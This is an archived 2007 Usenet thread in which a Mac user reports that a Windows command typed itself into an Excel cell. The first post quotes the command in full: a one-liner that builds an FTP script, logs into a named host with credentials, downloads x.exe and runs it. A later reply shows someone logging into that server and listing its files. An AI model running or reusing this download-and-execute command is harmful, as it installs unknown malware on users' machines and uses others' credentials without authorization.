Prev: Warning: Spyerase intentionally erases BugHunter from your machine
Next: Is ole16.dll a virus?
From: davanzati on 8 Mar 2007 10:53
Hi all,

I was working in an excel document, when I noticed that the selected
cell was moving itself. Then suddenly, one letter at a time, this
line typed itself in:

cmd /c echo open www.powersofthosting.com 21 >> ik &echo user mainston
powersoft >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >>
ik &ftp -n -v -s:ik &del ik &x.exe &exit

Obviously that's for Windows. Can I assume that this is an Excel
Macro virus? Obviously it can't be a Windows executable file (running
on a G5). Or is it possible that it's from a popup in a web browser?
But I didn't have anything open that would do that... gmail, my bank's
website, UPS, and this window.

Has anyone seen this before? I can't find anything about it on Usenet
or on the major search engines.

Thanks
Bill

From: Axel Hammerschmidt on 8 Mar 2007 12:28
davanzati <davanzatiusa(a)gmail.com> wrote:

> Hi all,
>
> I was working in an excel document, when I noticed that the selected
> cell was moving itself. Then suddenly, one letter at a time, this
> line typed itself in:
>
> cmd /c echo open www.powersofthosting.com 21 >> ik &echo user mainston
> powersoft

His is a good one:

Last login: Thu Mar 8 16:00:21 on console
Welcome to Darwin!
PwrB:~ abcd$ ftp
ftp> open www.powersofthosting.com
Connected to powersofthosting.com.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 17:17. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
Name (www.powersofthosting.com:abcd): mainston
331 User mainston OK. Password required
Password:
230-User mainston has group access to: mainston
230 OK. Current restricted directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Extended Passive mode OK (|||31897|)
150 Accepted data connection
drwx--x--x 8 32466 mainston 4096 Mar 7 23:49 .
drwx--x--x 8 32466 mainston 4096 Mar 7 23:49 ..
-rw-r--r-- 1 32466 mainston 24 Nov 11 2005 .bash_logout
-rw-r--r-- 1 32466 mainston 191 Nov 11 2005 .bash_profile
-rw-r--r-- 1 32466 mainston 124 Nov 11 2005 .bashrc
-rw-r--r-- 1 32466 mainston 24 Nov 11 2005 .contactemail
drwxr-xr-x 3 32466 mainston 4096 Oct 10 08:25 .cpaddons
-rw-r--r-- 1 32466 mainston 237 Nov 11 2005 .emacs
-rw-r--r-- 1 32466 mainston 120 Nov 11 2005 .gtkrc
drwxr-xr-x 3 32466 mainston 4096 Nov 11 2005 .kde
-rw-r--r-- 1 32466 mainston 136 Nov 11 2005 .zshrc
drwxrwx--- 2 32466 12 4096 Nov 11 2005 mail
drwxr-x--- 3 32466 mainston 4096 Nov 11 2005 public_ftp
drwxr-x--- 16 32466 99 4096 Sep 10 14:34 public_html
drwxr-xr-x 6 32466 mainston 4096 Dec 16 2005 tmp
lrwxrwxrwx 1 32466 mainston 11 Nov 11 2005 www ->
public_html
-rw-r--r-- 1 32466 mainston 540672 Mar 7 23:49 x.exe
226-Options: -a -l
226 17 matches total
ftp> exit
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.
PwrB:~ abcd$

Anyone...?
From: Ayatollah Yootweiss Al-Reddi on 9 Mar 2007 08:46
In article <1huo5e5.1eayco7yc3a9sN%hlexa(a)hotmail.com>,
hlexa(a)hotmail.com says...
> davanzati <davanzatiusa(a)gmail.com> wrote:
>
> > Hi all,
> >
> > I was working in an excel document, when I noticed that the selected
> > cell was moving itself. Then suddenly, one letter at a time, this
> > line typed itself in:
> >
> > cmd /c echo open www.powersofthosting.com 21 >> ik &echo user mainston
> > powersoft
>
> His is a good one:
>
> Last login: Thu Mar 8 16:00:21 on console
> Welcome to Darwin!
> PwrB:~ abcd$ ftp
> ftp> open www.powersofthosting.com
> Connected to powersofthosting.com.
> 220---------- Welcome to Pure-FTPd [TLS] ----------

You didn't attempt to delete x.exe?

--
If you don't want the whelks don't muck 'em about
If you don't want them someone else may
From: Axel Hammerschmidt on 9 Mar 2007 08:47
Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote:

<snip>

> You didn't attempt to delete x.exe?

No, but I do regret not getting a copy, e-mailing it to my Hotmail
account and let their anti-virus scan it to see if it really was a
virus.
From: Ayatollah Yootweiss Al-Reddi on 9 Mar 2007 09:05
In article <1hupq5s.asg9om1qckmgN%hlexa(a)hotmail.com>,
hlexa(a)hotmail.com says...
> Ayatollah Yootweiss Al-Reddi <ddotbudd(a)man.ac.uk> wrote:
>
> <snip>
>
> > You didn't attempt to delete x.exe?
>
> No, but I do regret not getting a copy, e-mailing it to my Hotmail
> account and let their anti-virus scan it to see if it really was a
> virus.
>
That's what I meant, of course. Did I say delete? Dearie dear,
that would be irresponsible.
--
If you don't want the whelks don't muck 'em about
If you don't want them someone else may
 |  Next  |  Last
Pages: 1 2 3
Prev: Warning: Spyerase intentionally erases BugHunter from your machine
Next: Is ole16.dll a virus?